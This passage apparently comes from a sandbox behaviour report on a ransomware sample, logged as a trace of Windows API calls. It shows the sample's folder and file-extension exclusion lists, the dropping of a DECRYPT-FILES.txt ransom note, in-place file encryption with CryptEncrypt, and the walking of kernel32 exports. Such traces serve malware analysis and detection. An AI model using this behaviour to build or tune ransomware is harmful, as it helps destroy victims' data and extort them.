HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0080.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp" [0080.318] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.318] CloseHandle (hObject=0x0) returned 0 [0080.318] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.318] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa59cd0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa59cd0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa59cd0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="jM5KvsW.lnk", cAlternateFileName="")) returned 1 [0080.320] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0080.320] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0080.320] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.320] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.320] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.320] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\jkbimi8.tmp") returned 83 [0080.321] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.326] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.326] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt") returned 89 [0080.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.327] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.328] CloseHandle (hObject=0x454) returned 1 [0080.328] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.328] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0080.328] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac135240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.328] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac135240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.328] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="DECRYPT-FILES.txt") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="autorun.inf") returned 1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="boot.ini") returned 1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="desktop.ini") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ntuser.dat") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="iconcache.db") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="bootsect.bak") returned 1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ntuser.dat.log") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="thumbs.db") returned -1 [0080.328] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="Bootfont.bin") returned 1 [0080.328] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0080.328] lstrcmpiW (lpString1="ZFSendToTarget", lpString2="lnk") returned 1 [0080.328] lstrcmpiW (lpString1="ZFSendToTarget", lpString2="exe") returned 1 [0080.329] lstrcmpiW (lpString1="ZFSendToTarget", lpString2="sys") returned 1 [0080.329] lstrcmpiW (lpString1="ZFSendToTarget", lpString2="dll") returned 1 [0080.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.329] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0080.329] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.329] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Compressed (zipped) Folder.ZFSendToTarget" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" [0080.329] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.329] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3) returned 1 [0080.329] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0080.329] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.329] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.330] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.330] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.331] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0080.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.332] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.332] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.332] CloseHandle (hObject=0x45c) returned 1 [0080.332] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.332] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0080.333] CloseHandle (hObject=0x0) returned 0 [0080.333] CloseHandle (hObject=0x458) returned 1 [0080.334] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.334] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.334] GetTickCount () returned 0x114c91a [0080.334] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.334] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.334] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.335] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.335] lstrlenA (lpString="kernel32.dll") returned 12 [0080.335] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.335] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.335] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.335] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.335] lstrlenA (lpString="ADDATOMA") returned 8 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.335] lstrlenA (lpString="ADDATOMW") returned 8 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.335] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.335] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.335] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.336] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.336] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.336] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.336] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.336] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.336] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.336] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.336] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.336] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.336] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.336] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.336] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.336] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.337] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.337] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.337] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.337] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.337] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.337] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.337] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.337] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.337] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.337] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.337] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.337] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.337] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.337] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.337] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.337] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.337] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.338] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.338] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.338] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.338] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.338] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.338] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.338] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.338] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.338] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.338] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.338] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.338] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.338] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.338] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") 